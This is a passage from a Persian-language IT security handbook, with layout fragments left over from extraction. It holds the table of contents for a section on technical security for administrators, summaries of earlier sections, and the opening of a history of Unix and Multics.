‫ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺣﺼﻮﻝ ﺍﻃﻤﻴﻨﺎﻥ ﻛﻨﻴﺪ؛‬
‫ﺍﺯ ﺳﻴﺴﺘﻢ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﺍﻣﻨﻴﺖ ﻳـﺎ ﻳﻜﭙـﺎﺭﭼﮕﻲ‬ ‫•‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﻪ ﺧﻄﺮ ﻣﻲﺍﻧﺪﺍﺯﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ؛‬

‫‪98‬‬ ‫‪United State’s Health Insurance Portability‬‬


‫‪and Accountability Act‬‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻓﺼﻞ ‪ .۱‬ﻣﻘﺪﻣﻪ‬
‫ﻓﺼﻞ ‪ .۲‬ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺭﺍﻫﱪﺍﻥ‬
‫ﻓﺼﻞ ‪ .۳‬ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ‬
‫ﻓﺼﻞ ‪ .۴‬ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‬
‫ﻓﺼﻞ ‪ .۵‬ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‬
‫ﻓﺼﻞ ‪ .۶‬ﺍﻣﻨﻴﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‬
‫ﻓﺼﻞ ‪ .۷‬ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ‬
‫ﻓﺼﻞ ‪ .۸‬ﺍﻧﻮﺍﻉ ﲪﻼﺕ ﻭ ﺭﻭﺵﻫﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁ‪‬ﺎ‬
‫ﻓﺼﻞ ‪ .۹‬ﻛﺸﻒ ﻭﻣﺪﻳﺮﻳﺖ ﻧﻔﻮﺫ‬
‫ﻓﺼﻞ ‪ .۱۰‬ﻧﻜﺎﺕ ﻭﻳﮋﻩ ﺑﺴﺘﺮﻫﺎﻱ ﳐﺘﻠﻒ‬
‫‪٢٥٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻓﺼﻞ ﺍﻭﻝ‬
‫ﻣﻘﺪﻣﻪ‬
‫ﺧﻼﺻﻪ ﺑﺨﺸﻬﺎﻱ ‪ ۱‬ﺗﺎ ‪۴‬‬
‫ﺣﺎﻝ ﻛﻪ ﺑﻪ ﻓﻨﻲﺗﺮﻳﻦ ﻛﺘﺎﺏ ﺭﺳﻴﺪﻩﺍﻳﻢ‪ ،‬ﻣﺮﻭﺭﻱ ﺑﺮ ﺁﻧﭽﻪ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ‪ ۱‬ﺗﺎ ‪ ۴‬ﺩﺭﺑﺎﺭﺓ ﺁﻥ ﺑﺤﺚ ﺷﺪ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺑﻪ ﻳﺎﺩ ﻣﻲﺁﻭﺭﻳﻢ ﻛﻪ‪:‬‬
‫ﺑﺨﺶ ‪ ۱‬ﻛﺘﺎﺏ ﻳﻚ ﻣﻌﺮﻓﻲ ﺍﺟﻤﺎﻟﻲ ﺍﺯ ﻣﺴﺎﺋﻞ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ ﺍﺭﺍﺋﻪ ﻛﺮﺩ‪ .‬ﺍﻳﻦ ﺑﺨﺶ ﮔﺴﺘﺮﺓ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺖ ‪ IT‬ﻭ ﺑﺮﺧـﻲ‬
‫ﺍﻋﻤﺎﻝ ﺗﺨﺎﺻﻢﺁﻣﻴﺰ ﺩﺭ ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺭﺍ ﺷﺮﺡ ﺩﺍﺩ‪ ،‬ﻭ ﻣﺸﺨﺺ ﻛﺮﺩ ﻛﻪ ﭼـﺮﺍ ﺧـﻂ ﻣـﺸﻲﻫـﺎ ﻭ ﺩﺍﻧـﺶ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩ‪،‬‬
‫ﻣﺆﺳﺴﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ‪ ،‬ﻳﺎ ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪.‬‬
‫ﺑﺨﺶ ‪ ۲‬ﺑﻪ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﻋﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﺷﺨﺼﻲ‪ ،‬ﻣﻨﺎﺑﻊ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺷﺒﻜﻪ ﺍﺷﺎﺭﻩ ﺩﺍﺷﺖ‪ .‬ﺍﻳﻦ ﺑﺨﺶ ﻣﺴﺎﺋﻞ ﻛﻠﻴﺪﻱ ﺍﻣﻨﻴﺖ ﺍﻧﻔﺮﺍﺩﻱ ﺭﺍ ﺩﺭ ﺑﺮ‬
‫ﮔﺮﻓﺖ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻳﻲ ﻓﻨﻲ ﺍﺭﺍﺋﻪ ﺩﺍﺩ ﻛﻪ ﺍﮔﺮ ﺩﺭﺳﺖ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪ ،‬ﺗﻬﺪﻳﺪ ﻧﻔﻮﺫ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﻣﻲﺭﺳﺎﻧﻨﺪ‪.‬‬
‫ﺑﺨﺶ ‪ ۳‬ﺟﻮﺍﻧﺐ ﺭﺍﻫﺒﺮﻱ ﻭ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺳﺎﺯﻣﺎﻧﻲ ﭘﻮﺷﺶ ﺩﺍﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﮔﻔﺘﻴﻢ ﺑﺎ ﻓﺮﺻﺘﻬﺎﻳﻲ ﻛﻪ ﺭﺳـﺎﻧﻪﻫـﺎﻱ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﺟﺪﻳﺪ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ ،‬ﺑﻨﮕﺎﻫﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ )‪SME‬ﻫﺎ( ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺑـﻪ ﻃـﺮﻑ ﻧﻘﻄـﻪﺍﻱ‬
‫ﺣﺮﻛﺖ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺩﺭ ﺗﻮﺳﻌﺔ ﺑﺎﺯﺍﺭﻫﺎﻱ ﻓﻌﻠﻲ ﺟﻬﺎﻥ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺷﻮﻧﺪ‪ .‬ﻭﺟﻮﺩ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﻨﺎﺳﺐ ﻭ ﺍﺟﺮﺍﻱ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ‪،‬‬
‫ﻣﺨﺎﻃﺮﺓ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﻭ ﻋﻤﺪﻱ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺧﻮﺍﻫﺪ ﺭﺳﺎﻧﺪ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺣﻤﻠﻪﻫﺎ ﻭ ﺗـﺮﻣﻴﻢ‬
‫ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺣﻮﺯﻩ ‪SME‬ﻫﺎ‪ ،‬ﻋﻨﺎﺻﺮﻱ ﭼﻮﻥ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺗﻌﺎﻣﻠﻲ ﺍﺯ ﻗﺒﻴﻞ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ‪ .‬ﺍﻳـﻦ ﺑﺨـﺶ‬
‫ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﺩﺍﺷﺖ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﻣﻘﺮﺭﺍﺕ ﺍﻣﻨﻴﺘﻲ ﻣﺴﺘﺤﻜﻢ ﺭﺍ ﺩﺭ ﺣﻮﺯﺓ ﻣﺤﻴﻄﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﺣﺎﻛﻢ ﻛﺮﺩ ﻭ ﮔﺴﺘﺮﺵ ﺩﺍﺩ‪.‬‬
‫ﺑﺨﺶ ‪ ۴‬ﺭﻭﻱ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻭ ﺍﺑﺘﻜﺎﺭﻫﺎﻱ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺗﺄﻛﻴﺪ ﺩﺍﺭﺩ؛ ﻭ ﺑﻴﺎﻥ ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﺑﺎﻳﺪ ﺩﺭ ﺳﻄﺢ ﺩﻭﻟﺖ ﺩﺭﻙ ﺷﻮﺩ ﻭ ﺑﻪ‬
‫ﺍﺟﺮﺍ ﺩﺭﺁﻳﺪ‪ .‬ﺩﻭﻟﺖ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺧﻮﺩ‪ ،‬ﻣﻮﻇﻒ ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﻳﻤﻦﺳـﺎﺯﻱ ﻭ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﻣﻠـﻲ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺍﻃﻼﻋﺎﺕ ﻧﻴﺰ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻛﻨﺪ‪ .‬ﺩﻭﻟﺘﻬﺎ ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﭘﻴﺶﺑﻴﻨﻲ ﻛﻨﻨﺪ ﻛﻪ ﺭﺷﺪ ﺯﻳﺮﺳﺎﺧﺖ ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﻧﻈﺎﻡ ﺣﻘﻮﻗﻲ ﺁﻧﻬﺎ ﭼﻪ ﺗـﺄﺛﻴﺮﻱ‬
‫ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺍﻳﻦ ﺑﺨﺶ ﺑﺮﺧﻲ ﺍﺯ ﺳﺆﺍﻻﺕ ﻛﻠﻴﺪﻱ ﻛﻪ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﺍﻥ ﻭ ﺭﻫﺒـﺮﺍﻥ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ ﻫـﺴﺘﻨﺪ ﺭﺍ‬
‫ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻭ ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺟﺎﻣﻌﻪ ﺟﻬﺎﻧﻲ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﺪ ﻛﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑﻌﻨـﻮﺍﻥ ﺭﺍﻫﻨﻤـﺎ ﺑـﺮﺍﻱ ﻛـﺴﺎﻧﻲ ﻛـﻪ ﺩﺭﮔﻴـﺮ‬
‫ﺗﻼﺷﻬﺎﻱ ﺟﺪﻳﺪ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺑﺮﺍﻱ ﻓﻀﺎﻱ ﻣﺠﺎﺯﻱ‪ ١‬ﻫﺴﺘﻨﺪ ﺑﻜﺎﺭ ﺁﻳﺪ‪.‬‬

‫ﺧﻼﺻﺔ ﺑﺨﺶ ﭘﻨﺠﻢ ﻫﻤﺮﺍﻩ ﻧﻜﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﭘﻴﺸﻴﻨﺔ ﻓﻨﻲ‬


‫ﺑﺨﺶ ‪ ۵‬ﺑﺎ ﻫﺪﻑ ﻛﻤﻚ ﺑﻪ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻭ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻣﺆﺛﺮ ﻭﻇﺎﻳﻔﺸﺎﻥ ﺗﻬﻴﻪ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﺍﻳـﻦ ﺑﺨـﺶ ﺍﻃﻼﻋـﺎﺗﻲ ﻣـﺸﺮﻭﺡ‬
‫ﺩﺭﺑﺎﺭﺓ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﺩﺭ ﺳﻄﺢ ﻓﻨﻲ ﺑﺎﻻ ﺩﺭﻙ ﻭ ﭘﻴﮕﻴﺮﻱ ﺷﻮﻧﺪ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﺯ ﺟﻤﻠﻪ‪:‬‬
‫ﺩﺳﺘﻪﺑﻨﺪﻱ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺷﺎﻣﻞ ﺭﻭﺷﻬﺎﻱ ﺣﻤﻠﻪ ﻛﻪ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬ ‫•‬

‫‪1‬‬ ‫‪Cyber Space‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٥٨‬‬

‫ﻛﻨﺘﺮﻝ ﺗﺮﺍﻓﻴﻚ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺣﺴﺎﺱ ﻭ ﺷﺒﻜﻪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﺮﺍﻱ ﺣﻤﻠﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺩﺭﺻـﻮﺭﺕ ﺍﻣﻜـﺎﻥ‬ ‫•‬
‫ﺩﻓﻊ ﺷﻮﻧﺪ‪.‬‬
‫‪٢‬‬
‫ﺍﺭﺯﺷﮕﺬﺍﺭﻱ ﻧﺘﺎﻳﺞ ﺍﺭﺯﻳﺎﺑﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺯﻣﺎﻧﻴﻜﻪ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻓﺮﺁﻳﻨﺪﻫﺎ ﺩﺭﺣﺎﻝ ﺗﻮﻟﻴﺪ ﺷﺪﻥ ﻫﺴﺘﻨﺪ ﻭ ﺗﺤﻠﻴـﻞ ﻧﺘـﺎﻳﺞ ﺛﺒﺘﻬـﺎ ﻭ ﺳـﺎﻳﺮ‬ ‫•‬
‫ﻣﺪﺍﺭﻙ ﺟﺎﺭﻱ ﺑﻌﺪ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪.‬‬
‫ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻳﻚ ﺣﻤﻠﻪ‪ ،‬ﺗﺮﻣﻴﻢ ﻳﻚ ﻧﻔﻮﺫ‪ ،‬ﻭ ﻳﺎﺩﮔﻴﺮﻱ ﺍﺯ ﺗﺠﺮﺑﻴﺎﺕ ﮔﺬﺷﺘﻪ‪.‬‬ ‫•‬

‫ﺑﺨﺶ ‪ ۵‬ﺑﺎ ﭼﻬﺎﺭ ﺑﺨﺶ ﺩﻳﮕﺮ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺯ ﺁﻥ ﺟﻬﺖ ﺗﻔﺎﻭﺕ ﺩﺍﺭﺩ ﻛﻪ ﻓﺮﺽ ﻣﻲﻛﻨﺪ ﺧﻮﺍﻧﻨﺪﻩ ﺍﺯ ﺳﻄﺢ ﻣﻌﻴﻨﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻓﻨﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ‬
‫ﺍﺳﺖ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻣﻔﺎﻫﻴﻢ ﺑﻪ ﻭﺿﻮﺡ ﺷﺮﺡ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ ﻭ ﻫﺮﺟﺎ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺍﺷﺘﻪ ﻣﺜﺎﻟﻬﺎﺋﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧﺪ‪ ،‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳـﻦ ﺑﺨـﺶ ﺑـﺮﺍﻱ‬
‫ﺍﻓﺮﺍﺩﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺍﺳﺖ ﻛﻪ ﺗﺠﺮﺑﺔ ﻛﺎﻓﻲ ﻛﺎﺭ ﺑﺎ ﺳﻴﺴﺘﻢ ﻭ ﺭﺍﻫﺒﺮﻱ ﺁﻥ ﺩﺍﺭﻧﺪ )ﻳﺎ ﺣﺪﺍﻗﻞ ﺑـﺴﻴﺎﺭ ﻋﻼﻗـﻪﻣﻨـﺪ ﺑـﻪ ﺁﻥ ﻫـﺴﺘﻨﺪ(‪ .‬ﺑـﻪ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ‬
‫ﻋﻼﻗﻪﻣﻨﺪ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﺍﺯ ﺿﻤﺎﺋﻢ ﻛﺘﺎﺏ ﻛﻪ ﺑﻪ ﻣﺂﺧﺬ ﺍﺭﺯﺷﻤﻨﺪ ﻓﺮﺍﻭﺍﻧﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﻧﮕﻬﺪﺍﺭﻱ ﺭﺍﻳﺎﻧﻪ ﻭ ﺷﺒﻜﻪ ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﻻ ﺑﻪ ﻣﺤﻴﻄﻬﺎﻱ ﻋﻤﻠﻴﺎﺗﻲ ﺭﺍﻳﺎﻧﻪ ﻣﺮﺑﻮﻁ ﻫﺴﺘﻨﺪ‪ ،‬ﺑﺨﺶ ‪ ۵‬ﺷﺎﻣﻞ ﻗﺴﻤﺘﻬﺎﻳﻲ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﻛـﻪ ﻣـﺴﺎﺋﻞ‬ ‫ﻧﻈﺮ ﺑﻪ ﺍﻳﻨﻜﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﻣﻨﻴﺘﻲ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻋﻤﺪﻩ ﻛﻪ ﺍﻣﺮﻭﺯﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪ .‬ﮔﺮﭼﻪ ﻗﺴﻤﺖ ﻋﻤﺪﺓ ﺑﺨﺶ ‪ ۵‬ﺗﺎ‬
‫ﺟﺎﻳﻲ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺍﺷﺘﻪ ﻏﻴﺮ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﮔﺎﻫﻲ ﺍﺭﺟﺎﻉﻫﺎﻳﻲ ﻧﻴﺰ ﺑﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ‪،Unix ،Microsoft Windows‬‬
‫‪ ،Mac OS X ،Linux‬ﻭ ﺳﺎﻳﺮ ﮔﻮﻧﻪﻫﺎﻱ ‪ Unix‬ﺭﻭﻣﻴﺰﻱ‪ ٣‬ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﻫﻤﺔ ﻣﻮﺍﺭﺩ ﺗﻮﺻﻴﻪﻫـﺎﻱ ﺭﻭﺷـﻨﻲ ﺩﺭﺑـﺎﺭﻩ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﻛـﻪ‬
‫ﻣﻲﺗﻮﺍﻥ ﻭ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑﻪﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻥ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻤﻲ ﺍﻧﺠﺎﻡ ﺩﺍﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬

‫‪Unix‬‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ‪ Unix‬ﻭ ﺷﺒﻪ ‪ Unix‬ﻣﺘﻨﻮﻋﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ )ﻛﻪ ﮔﺎﻩ ﻛﺎﻣ ﹰﻼ ﺑﺎ ﻫﻢ ﻣﺘﻔﺎﻭﺗﻨـﺪ( ﻭ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﺘﻔﺎﻭﺗﻲ ﺗﻮﺯﻳـﻊ ﻣـﻲﺷـﻮﻧﺪ‪.‬‬
‫ﺩﻟﻴﻞ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻭ ﺗﺄﺛﻴﺮﺍﺕ ﺁﻥ ﻣﺴﺘﻠﺰﻡ ﻳﻚ ﻣﺮﻭﺭ ﻣﺨﺘﺼﺮ ﺗﺎﺭﻳﺨﻲ ﺍﺳﺖ‪.‬‬
‫ﺭﻳﺸﻪﻫﺎﻱ ‪ Unix‬ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ ﺑﻪ ﻃﺮﺡ ‪ Multics‬ﺩﺭ ﺍﻭﺍﺳﻂ ﺳـﺎﻟﻬﺎﻱ ‪ .۱۹۶۰‬ﺍﻳـﻦ ﭘـﺮﻭﮊﻩ ﻛـﻪ ﺑﻮﺳـﻴﻠﻪ ﺳـﺎﺯﻣﺎﻥ ﻃﺮﺣﻬـﺎﻱ ﺗﺤﻘﻴﻘـﺎﺗﻲ‬
‫ﭘﻴﺸﺮﻓﺘﻪ ﻭﺯﺍﺭﺕ ﺩﻓﺎﻉ ﺍﻳﺎﻟﺖ ﻣﺘﺤﺪﻩ )‪ DARPA‬ﻳﺎ ‪ (ARPA‬ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺷﺪ ﺑﺮﺍﻱ ﺁﻥ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻳﻜﭙﺎﺭﭼﻪ ﻣﺘﺸﻜﻞ‬
‫ﺍﺯ ﺑﺎﻧﻜﻬﺎﻳﻲ ﺑﺎﺷﺪ ﻛﻪ ﺣﺎﻭﻱ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎ‪ ،‬ﺣﺎﻓﻈﻪ‪ ،‬ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﺍﺭﺗﺒﺎﻃﻲ ﺑﺎ ﺳﺮﻋﺖ ﺑﺎﻻ ﺑﻮﺩﻧﺪ‪ .‬ﺑﺮﺍﺳـﺎﺱ ﺍﻳـﻦ ﻃﺮﺍﺣـﻲ‪ ،‬ﺑﺨـﺸﻲ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺁﻧﻜﻪ ﺭﻭﻱ ﺩﻳﮕﺮ ﻗﺴﻤﺘﻬﺎ ﻳﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺗﺄﺛﻴﺮ ﺑﮕﺬﺍﺭﺩ‪ ،‬ﺑﺮﺍﻱ ﺗﻌﻤﻴﺮﺍﺕ ﺧﺎﻣﻮﺵ ﺷﻮﺩ‪ .‬ﮔﺮﭼﻪ ﺍﻣﺮﻭﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﻪ ﺳﺎﺩﮔﻲ ﻣﻴﺴﺮ‬
‫ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻫﻨﮕﺎﻣﻲ ﻛﻪ ‪ Multics‬ﺷﺮﻭﻉ ﺑﻪ ﻛﺎﺭ ﻛﺮﺩ ﭼﻨﻴﻦ ﻗﺎﺑﻠﻴﺘﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺖ‪ Multics .‬ﺑﮕﻮﻧـﻪﺍﻱ ﻃﺮﺍﺣـﻲ ﺷـﺪ ﻛـﻪ ﻫـﻢ ﺩﺭ ﺑﺮﺍﺑـﺮ‬
‫ﺣﻤﻼﺕ ﺑﻴﺮﻭﻧﻲ ﻣﻘﺎﻭﻡ ﺑﺎﺷﺪ ﻭ ﻫﻢ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺍﺧﻠﻲ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺣﻔﺎﻇﺖ ﻛﻨـﺪ‪ Multics .‬ﺑـﺎ ﻫـﺪﻑ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣﻔﻬـﻮﻡ ﺍﻣﻨﻴـﺖ‬
‫ﭼﻨﺪﺳﻄﺤﻲ‪ ٤‬ﻃﺮﺍﺣﻲ ﺷﺪ‪ Multics .‬ﺑﺎﻻﺧﺮﻩ ﺳﻄﺤﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻭ ﺧﺪﻣﺎﺕ ﺭﺍ ﻓﺮﺍﻫﻢ ﻛﺮﺩ ﻛﻪ ﻫﻨﻮﺯ ﻫﻢ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﺑﻪ ﺁﻥ ﻧﺮﺳﻴﺪﻩﺍﻧﺪ‪.‬‬
